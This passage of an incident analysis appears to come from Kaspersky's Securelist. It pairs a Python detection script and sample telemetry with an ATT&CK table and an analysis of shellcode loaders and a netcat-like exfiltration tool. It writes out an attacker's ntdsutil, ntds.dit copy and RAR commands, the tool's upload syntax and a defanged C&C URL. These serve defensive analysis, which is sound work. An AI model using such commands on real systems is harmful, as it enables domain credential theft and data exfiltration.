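                chains.append({"host": host, "ntds": ntds, "archive": archive, "exfil": exfil})
    return chains


# Constructed telemetry modelled on the case above; IPs are from documentation ranges.
SAMPLE_EVENTS = [
    {"ts": 0, "host": "DC01", "type": "process", "image": "cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit'},
    {"ts": 90, "host": "DC01", "type": "process", "image": "nd.exe",
     "cmdline": r"nd.exe c:\windows\ntds\ntds.dit c:\users\public\nt.txt"},
    {"ts": 600, "host": "DC01", "type": "process", "image": "rar.exe",
     "cmdline": r"rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp"},
    {"ts": 700, "host": "DC01", "type": "netconn", "image": "s.exe",
     "dst_ip": "192.0.2.10", "dst_port": 53, "app_proto": "http"},
    {"ts": 710, "host": "DC01", "type": "netconn", "image": "svchost.exe",
     "dst_ip": "192.0.2.2", "dst_port": 53, "app_proto": "dns"},
    # a workstation that archives documents and browses normally: no chain
    {"ts": 100, "host": "WS07", "type": "process", "image": "rar.exe",
     "cmdline": r"rar.exe a -r d:\backup\docs.rar d:\docs"},
    {"ts": 200, "host": "WS07", "type": "netconn", "image": "chrome.exe",
     "dst_ip": "198.51.100.5", "dst_port": 443, "app_proto": "tls"},
]

if __name__ == "__main__":
    for chain in correlate(SAMPLE_EVENTS):
        print(chain["host"], "->", chain["exfil"]["image"], chain["exfil"]["dst_ip"], chain["exfil"]["dst_port"])
```

The port/protocol mismatch needs a sensor that identifies the application protocol (a proxy, an IDS, or a flow exporter with application detection); with bare NetFlow the rule degrades to "53/TCP from a process that is not the DNS client", which is weaker but still catches the s.exe connection above.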
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1569.002: Service Execution
Command line analysis
The attacker performed reconnaissance and search in local logs
The attacker persisted in the victim’s system through service creation
Windows events on service installation and service start
AM behavior analysis
The attacker executed windnphd.exe through psexec
T1592: Gather Victim Host Information
T1590: Gather Victim Network Information
Command line analysis
The attacker performed internal reconnaissance
T1021.002: SMB/Windows Admin Shares
Inbound and outbound share access
The attacker tried to access:
\\10..65\ipc$
\\10..52\c$
T1003.003: NTDS
Command line analysis
The attacker accessed NTDS.dit with ntdsutil
T1071.001: Web Protocols
The SOC checked if the data transfer was successful
The attacker communicated with the C&C server at hxxp[:]//31.192.234[.]60:53/useintget
The connection was initiated by the suspicious process windnphd.exe
T1571: Non-Standard Port
The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port
The attacker used the C&C server hxxp[:]//31.192.234[.]60:53/useintget
T1587.001: Malware
Use of various suspicious binaries prepared by the attacker specifically for this attack
The attacker used custom tools:
s.exe
winpdasd.exe
windpchsvc.exe
(see detailed report below)
T1497: Virtualization/Sandbox Evasion
Detected the HookSleep function (see below)
The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools: winpdasd.exe and windpchsvc.exe
T1036.005: Match Legitimate Name or Location
Operations with the file c:\users\Default\ntusers.dat
The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat
T1140: Deobfuscate/Decode Files or Information
The file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe
The attacker executed arbitrary code
T1560.001: Archive via Utility
Use of the RAR archiver for data collection
The attacker archived the stolen credentials and documents
T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
Command line analysis
The attacker used a custom tool to exfiltrate data
Analysis of the process that initiated the connection
An analysis of the custom tools used by the attacker
windpchsvc.exe and winpdasd.exe
Both samples are loaders: each reads a payload from a file on disk, decodes it, and executes it directly via a function call. The payload is encoded shellcode.
Both read from a file whose name is chosen to deceive investigators and users by resembling a legitimate system file:
Payload file for windpchsvc.exe
The malware windpchsvc.exe reads from the file c:\users\Default\ntusers.dat. A legitimate file named ntuser.dat exists in the same directory; note that the bona fide registry hive name has no 's'.
A similar file name was used for the winpdasd.exe malware:
Payload file for winpdasd.exe
The malware reads from this file and decodes the bytes for direct execution via a function call as seen below (call [ebp+payload_alloc] and call esi ):
windpchsvc.exe: decode, allocate memory, copy to mem, execute
winpdasd.exe: decode, allocate memory, copy to mem, execute via function call
The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.
Some of the images show a function that I labeled “HookSleep”, which might be used for sandbox evasion in other variants of this malware: it redirects the Win32 Sleep function to the malware's own routine. In the samples analyzed, the function has no direct effect on the execution of the payload.
The decompiled function can be seen below:
The “HookSleep” function found in both files, decompiled
When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:
The Sleep function redirected back to the malware code
s.exe
This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:
s.exe <file> <IP address> <port> <up|down>
This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.
The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:
Decompiled network transfer tool
[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.
Source: Securelist